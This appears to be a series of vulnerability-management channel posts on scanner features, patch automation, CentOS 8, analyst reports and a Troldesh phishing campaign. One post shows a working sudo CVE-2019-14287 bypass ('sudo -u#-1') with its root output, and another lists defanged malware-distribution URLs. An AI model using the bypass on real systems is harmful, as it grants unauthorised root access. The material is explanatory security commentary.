Pretty nice GUI feature in the latest #Nessus Professional 8.7.0. Now you can select a host or hosts in the scan results and create a new scan based on a different Scan Template/Policy. For example, you can perform a fast discovery scan, filter some hosts and then scan them deeply with authentication. The other features of this release are about Nessus Manager and Essentials, so not very interesting for me. #Tenable
Features in the GUI are certainly pleasant, but the real game changer in Vulnerability Management, IMHO, will be automated patching for a reasonable price. It is much better when you do not just say that some systems are vulnerable but fix these problems with one click. At least most of them.
So, it's great that some VM vendors work on this. For example, 2 weeks ago #Qualys released a new 1.3 version of Patch Management module. It seems from the changes list that they understand: Windows patching is not only about the actual installation of the patches. It is also about:
- Catching the right time for patching. Now in Qualys you can choose "None" for the Patch Window and install an emergency patch as soon as possible; patches can also be pre-downloaded before the job starts to save some time.
- Changes in the registry and other reconfigurations.
- Reboots. Now in Qualys you can suppress reboot notification and reboot the host immediately after the patch deployment.
These are steps in the right direction.
The main thing that upsets me in #CentOS8 (which was finally released 4 days ago) is the lack of alternative desktop environments in the repositories, even in EPEL. There is only a sloooow Gnome 3 with terrible junk animations that I REALLY hate.
And now I am thinking about what is better: to put up with Gnome (at least for a while) and patiently wait for my favourite #XFCE in EPEL (there is a request for this), to install XFCE from source (it seems difficult) or to try to install some other minimalistic DE from source...
I doubt that there are many people who use #CentOS as a Desktop OS, but if there are any, I would be happy to hear your opinion at https://t.iss.one/avleonovchat.
I just saw a nice post by #JSOC (in Russian) about the new version of #Troldesh cryptolocker cyberattack. This time attackers use legitimate but compromised #WordPress websites in phishing.
The links look pretty normal:
- Horsesmouth[.]org/wp-content/themes/InspiredBits/images/dummy/doc/doc/
- www.montessori-academy[.]org/wp-content/themes/campus/mythology-core/core-assets/images/social-icons/long-shadow/doc/
- chestnutplacejp[.]com/wp-content/ai1wm-backups/doc/
Since these sites are legit and have a good reputation, it's quite difficult to detect and block emails with such links.
This is another good reason to update a vulnerable CMS as soon as possible, since malware distribution can be even more dangerous for your business than the compromise of the site itself.
#cryptolocker #phishing
Continuing the topic about the Qualys PM feature, I REALLY want to see the universal fully automated #PatchManagement (and therefore #VulnerabilityManagement), but I DON'T think we are close to that.
1. It is difficult to formalize all the steps that are necessary for patching. There are thousands of third-party software products (especially for Windows desktops). Even to get information about all the vulnerabilities in all these products is hard, getting the actionable and formal remediation instructions for them is even harder, and it's almost impossible to follow these instructions automatically and in a reliable way.
2. Patches sometimes break systems. It just happens. In a common human-driven process, there will always be a responsible person, who has not performed all necessary tests before actual patching and has not discussed the possible consequences with the system owner. In a fully automated process, you only have a PM product and the vendor who does not guarantee anything.
Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:
1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.
It seems a bit foolish to offer automated remediation for systems where almost everything can be updated with a single command from #WSUS or a Linux repository. However, in the case of Linux, there will be software installed from sources, self-built packages, and other complexities. And that's even without talking about #Docker.
So, it turns out that the most convenient thing for vendors is to focus on Windows desktops. And not for all programs, but only for a specific list (clarify this to avoid surprises!).
Plus, the trigger and responsibility are still in the hands of IT administrators.
Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.
Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with a U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy" fighters?
The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and its people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. At least, it is much better than facing such unfriendly unilateral actions unprepared and without any alternatives.
It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).
Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.
My reasons were as follows:
1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of Linux world. The only way to achieve this is to use such distribution every day.
3. I was tired of problems with the VirtualBox guest additions in #CentOS 7 (yes, I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it's slow and ugly (however, it's fully functional!). And there were no other DEs in the CentOS 8 repositories at that time.
Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/
A nice, but not very practical bug in #sudo, CVE-2019-14287 (fixed in sudo 1.8.28). Let's say I created a temp user:
# useradd temp
# passwd temp
And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id
Then I log in as the temp user:
# su temp
I can run /usr/bin/id as the temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)
I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.
BUT if I specify a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's the bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)
^- we see that it was really executed as root with uid 0 (the gid stays temp's, as the output shows). The precondition is a sudoers rule that allows a command for any runas user except root, i.e. the "(ALL, !root)" form: uid -1 is not root by name, so it passes the exclusion check, but sudo then hands -1 to setresuid(), which treats it as "leave unchanged", and the process keeps sudo's own uid 0.

Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in the open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. The bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha!
What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?
There are two main issues that each Vulnerability Scanning vendor faces:
1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside a big organization, where people can build integrations with various IT data sources, it's not so obvious what to scan! Of course, you can get some targets using known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important and/or add unrelated trash. Thus, there will be many false positives and false negatives in your report.
2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.
So, I stand for homegrown solutions that can be customized in different ways.
BUT I am also for the constant comparisons with the commercial scanning services. Not because they will provide a better alternative (most likely not), but because they do the things independently and differently. The simple diff with their results can show whether your process is good enough: maybe some domains are managed on a different DNS server and you don't see them, maybe some target hosts have already banned your scanner and you don't see their services, maybe some host scans fail because of timeouts and various anti-scan measures, etc. Anything can happen!
When you have alternative results, it's much easier to evaluate the quality of your own system and make changes.
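The "simple diff" described above, as an added example that is not part of the original post: it takes the homegrown scanner's results and the commercial service's export, and sorts the differences into the failure modes mentioned (hosts you never saw, hosts that went dark for your scanner, ports only one side found). The formats are assumptions (nmap grepable output for your own scan, a host,port,protocol,service CSV for the service), and both inputs are constructed samples.

```python
"""
Added example, not from the original post: diff your own perimeter scan
against an independent scanning service's results, per host and per port.
Both inputs are constructed samples; the formats are assumptions.
"""
import csv
import io
import re
from collections import defaultdict

# Constructed nmap -oG ("grepable") output from the homegrown scanner.
OWN_SCAN_GNMAP = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 203.0.113.10 (www.example.com)\tStatus: Up
Host: 203.0.113.10 (www.example.com)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///
Host: 203.0.113.11 (mail.example.com)\tStatus: Up
Host: 203.0.113.11 (mail.example.com)\tPorts: 25/open/tcp//smtp///, 443/open/tcp//https///, 8443/filtered/tcp//https-alt///
Host: 203.0.113.12 ()\tStatus: Down
# Nmap done (constructed sample)
"""

# Constructed export from a commercial perimeter scanning service.
SERVICE_CSV = """\
host,port,protocol,service
203.0.113.10,80,tcp,http
203.0.113.10,443,tcp,https
203.0.113.11,25,tcp,smtp
203.0.113.11,443,tcp,https
203.0.113.11,8443,tcp,https-alt
203.0.113.12,3389,tcp,ms-wbt-server
203.0.113.20,443,tcp,https
"""

# port/state/protocol/owner/service/... as written in gnmap "Ports:" lines
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)///")


def parse_gnmap(text):
    """Return {host: {(port, proto)}} for open ports; a host seen but with no
    open ports (e.g. Status: Down) is kept with an empty set."""
    result = defaultdict(set)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        result.setdefault(host, set())
        if "Ports:" not in line:
            continue
        for port, state, proto, _service in PORT_RE.findall(line):
            if state == "open":
                result[host].add((int(port), proto))
    return dict(result)


def parse_service_csv(text):
    """Return {host: {(port, proto)}} from the service's CSV export."""
    result = defaultdict(set)
    for row in csv.DictReader(io.StringIO(text)):
        result[row["host"]].add((int(row["port"]), row["protocol"]))
    return dict(result)


def diff_scans(own, service):
    """Classify every difference between the two {host: ports} maps."""
    report = {
        "unknown_hosts": {},  # service knows the host, we never scanned it (asset inventory gap)
        "blind_hosts": {},    # we saw the host but found nothing; banned, timed out, filtered?
        "missing_ports": {},  # same host, ports only the service found
        "extra_ports": {},    # ports only we found: service gap or our false positive
    }
    for host in sorted(set(own) | set(service)):
        ours = own.get(host)
        theirs = service.get(host, set())
        if ours is None:
            report["unknown_hosts"][host] = theirs
        elif not ours and theirs:
            report["blind_hosts"][host] = theirs
        else:
            if theirs - ours:
                report["missing_ports"][host] = theirs - ours
            if ours - theirs:
                report["extra_ports"][host] = ours - theirs
    return report


def run_example():
    report = diff_scans(parse_gnmap(OWN_SCAN_GNMAP), parse_service_csv(SERVICE_CSV))
    for category, hosts in report.items():
        for host, ports in hosts.items():
            listed = ", ".join(f"{port}/{proto}" for port, proto in sorted(ports))
            print(f"{category:14} {host:15} {listed}")
    return report


if __name__ == "__main__":
    run_example()
```

In the sample, 203.0.113.20 shows up only at the service (a host you do not know about), 203.0.113.12 was "Down" for your scanner but has RDP open according to the service, 8443 on the mail host was filtered for you and open for them, and SSH on the web server was found only by you. Each category points at a different thing to fix in your own process.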
I just read the 14-page report "Comparing vulnerability and security configuration assessment coverage of leading VM vendors" by Principled Technologies. Tenable's marketing team actively shared it last week.
The main idea of the report: Tenable covers more CVEs and CIS benchmarks than Qualys and Rapid7.
So, my impressions:
1. Hallelujah! Finally, a comparison of Vulnerability Management products based on something measurable - on their Knowledge Bases. And at least one VM vendor is not afraid to use it in marketing and mentions the competitors directly. This is a huge step forward and I hope that this is the beginning of something more serious. We really need to start talking more about the core functionality of VM products.
2. However, this particular report is just a Tenable advertisement. This is not even hidden. I really like Nessus and Tenable, and believe that they have a very good Knowledge Base, but reading on every page how great Tenable's products are is just ridiculous. It would be much better to read it in more neutral form.
3. Using only the CVE IDs for comparing Vulnerability Knowledge Bases is NOT correct (strictly speaking), because for many software products most of vulnerabilities do not have CVEs, only the patch IDs. CVE-based comparison also doesn't distinguish types of vulnerability checks: remote banner-based, remote exploit-based and local. To make a reliable comparison, it's necessary to map all existing vulnerability detection plugins of VM products, but this is MUCH more difficult.
4. CVE-based comparison in this report is not really informative. They only compare absolute numbers of IDs grouping them by year, software product (cpe) and cvss v2 score. Why is this wrong? If VM vendor A covers 1000 CVEs and vendor B covers 1000 CVEs, this does not mean that they have the same database and it is quite complete. The real intersection between the KBs may be only 500 IDs, so these vendors would be able to detect only a half of each other's vulnerabilities. It matters, right? In my old express comparison of Nessus and OpenVAS Knowledge Bases I demonstrated this and tried to suggest reasons why some vulnerabilities are covered by some vendor and others are not. If you compare CVEs as sets of objects, it turns out that each VM product has own advantages and disadvantages.
5. CIS-based comparison in this report uses only information about certified implementations from the CIS website without regard to versions and levels. CIS Certification is an expensive and complicated procedure that is NOT mandatory and does not affect anything. I once implemented many CIS standards for Linux/Unix in PT Maxpatrol. Well, yes, they are not certified and you won't see them on the CIS website, but does this mean that they are not supported in the VM/CM product? Of course not! So, it's a very strange way of comparing Compliance Management capabilities.
In conclusion, the idea behind this report is good, but the implementation is rather disappointing. If one of the VM vendors, researchers or customers wants to make a similar comparison, public or private, but in a much more reliable and fair way - contact me, I will be glad to take part in this.
#PrincipledTechnologies #Tenable #Rapid7 #Qualys #CVE #CIS #VulnerabilityManagement #ComplianceManagement #CPE #CVSS #PositiveTechnologies #MaxPatrol #OpenVAS #Nessus
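The "1000 vs 1000 CVEs, 500 in common" point above, as an added example that is not part of the original post: compare two knowledge bases as sets of CVE IDs, next to the per-year totals the report uses. The two vendor lists are constructed (the IDs are real CVEs, but which list "covers" which is made up and says nothing about any real product).

```python
"""
Added example, not from the original post: compare two vulnerability
knowledge bases as sets of CVE IDs instead of per-year totals.
VENDOR_A and VENDOR_B are constructed; the coverage is hypothetical.
"""
from collections import Counter

VENDOR_A = {
    "CVE-2019-0708", "CVE-2019-14287", "CVE-2019-16278", "CVE-2019-11510",
    "CVE-2018-11776", "CVE-2018-7600",
    "CVE-2017-0144", "CVE-2017-5638",
}
VENDOR_B = {
    "CVE-2019-0708", "CVE-2019-14287", "CVE-2019-19781", "CVE-2019-2725",
    "CVE-2018-11776", "CVE-2018-1000861",
    "CVE-2017-0144", "CVE-2017-11882",
}


def per_year(cves):
    """Counts grouped by CVE year: the kind of number the report compares."""
    return Counter(cve.split("-")[1] for cve in cves)


def compare_kbs(a, b):
    """Set-based comparison: overlap, one-sided coverage and what each side lacks."""
    common = a & b
    return {
        "per_year_a": dict(per_year(a)),
        "per_year_b": dict(per_year(b)),
        "common": sorted(common),
        "only_a": sorted(a - b),
        "only_b": sorted(b - a),
        # share of the other vendor's CVEs that this vendor would also detect
        "a_covers_b": len(common) / len(b),
        "b_covers_a": len(common) / len(a),
        "jaccard": len(common) / len(a | b),
    }


def print_report(result):
    print("per-year counts A:", result["per_year_a"])
    print("per-year counts B:", result["per_year_b"])
    print(f"common: {len(result['common'])}, only A: {len(result['only_a'])}, "
          f"only B: {len(result['only_b'])}")
    print(f"A detects {result['a_covers_b']:.0%} of B's CVEs, "
          f"B detects {result['b_covers_a']:.0%} of A's, "
          f"Jaccard {result['jaccard']:.2f}")
    for cve in result["only_a"]:
        print("  missing from B:", cve)
    for cve in result["only_b"]:
        print("  missing from A:", cve)


if __name__ == "__main__":
    print_report(compare_kbs(VENDOR_A, VENDOR_B))
```

With these inputs both vendors show 4/2/2 CVEs for 2019/2018/2017, exactly what a per-year bar chart would display as a tie, while each would detect only half of the other's vulnerabilities. The "only_a"/"only_b" lists are what you would actually want to read in such a report.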
Yep, it's been a while since the last update. But I'm still working on Zbrunk and think this project is very important. It stuck a bit, but I hope to make small commits every evening. I also changed the priorities. Now I think it would be better not to integrate with Grafana, but to create own dashboards and GUI. And to begin with, I created a simple interface for Searching (and Deleting) events. #flask #vuejs #zbrunk
It's becoming a good tradition to share my impressions of the Forrester Wave "Vulnerability Risk Management" report (here is the one for Q1 2018). You can download a free reprint for Q4 2019 from the Tenable website. This time I even edited the illustration a bit. I tried to show how the positions of vendors changed, and which were added or removed. Please note that this is not official, it's just an extra layer that I added for fun.
What I liked:
The report has become much more adequate than last year. The traditional VM Big Three (Qualys, Tenable and Rapid7) are the leaders. Stagnant VM vendors have been downgraded or completely removed from the report. This is probably due to new and more adequate inclusion criteria: "product improvements over the last two years", "annual product revenue greater than $10 million", "VRM product was responsible for over 50% of their total revenue", "at least 100 enterprise customers", etc.
What I did NOT like (and this hasn't changed much since last year):
1. The main slogan of this report is "Prioritization And Reporting Are Key Differentiators". According to Forrester, Risk Prioritization is based on measuring vulnerabilities, assets and network segments. Well, I agree that Risk Prioritization is important. BUT (!) only when your Vulnerability Detection is perfect. This is clearly not the case at the moment! For proper Risk Prioritization it's necessary to understand the limitations of Vulnerability Scanners and how to obtain data for Asset and Network classification. Unfortunately, this report doesn't pay much attention to the core functionality of VM products; it focuses on GUI, reports and high-level marketing features. "Vulnerability enumeration" is only 15% of the overall weighting. It's really sad.
2. Profile descriptions are based on marketing materials from vendors (BTW, such extract might be quite useful), and on some user quotes. These users also write about the reports and prioritization, like "custom reporting on individual business units was cumbersome" and "customers appreciate the new UI and strong reporting capabilities". It seems these users don't have (don't see/don't want to discuss) other problems.
3. Forrester mixes products that actually scan network hosts with products that only analyze imported data, perimeter-only services (why not add over 9000 ASV scanners then?) and scan services with a "dedicated security specialist". The authors even write several times that some products "cannot be treated as a proper vulnerability management tool", so why include them in the report?
In any case, the report was better than last year. I hope Forrester will make separate reports for the tools that actually detect vulnerabilities and the tools that only aggregate and prioritize them. It would also be great to change the inclusion criteria and add smaller and more local VM vendors.
#Forrester #Brinqa #DigitalDefense #Expanse #KennaSecurity #NopSec #Outpost24 #Qualys #Rapid7 #RedSeal #RiskIQ #RiskSense #SkyboxSecurity #Tenable #BeyondSecurity #Tripwire #Symantec #BeyondTrust #IBM
Vulnerability Management and more
BTW, do you think there will be a new massive malware attack soon similar to WannaCry, but with the use of latest RDP RCE vulnerability (CVE-2019-0708)? Let's say during next 30 days.
Well, it's nice to recall this poll from May. It took ~6 months for #BlueKeep (CVE-2019-0708) to get a commercial exploit, then a free public exploit, and finally a first sample of malware that uses this vulnerability to deliver a Monero cryptocurrency miner. Of course, this is not comparable to the WannaCry epidemic, and this malware seems to be successful mainly at BSODing RDP honeypots, but still.
What a crazy paranoid world we live in! Gitlab published the news that they will not hire people from Russia and China (by country-of-residence). At least for positions with access to sensitive data.
Eric Johnson, VP of Engineering at GitLab, calls this "a common practice in our industry in the current geopolitical climate". And the choice of only 2 countries is based on "concerns of several customers".
I am sure that #GitLab is not the only company with such country-of-residence block. But this is one of the few cases when it's discussed openly. I especially recommend to read several comments of Candice Ciresi, Director of Global Risk and Compliance at GitLab, in the thread where she criticizes this decision from both formal and rational points of view.
As for my opinion, I find absolutely ridiculous the idea that such measures will help to protect a company from insiders (who can somehow be pressured by a state).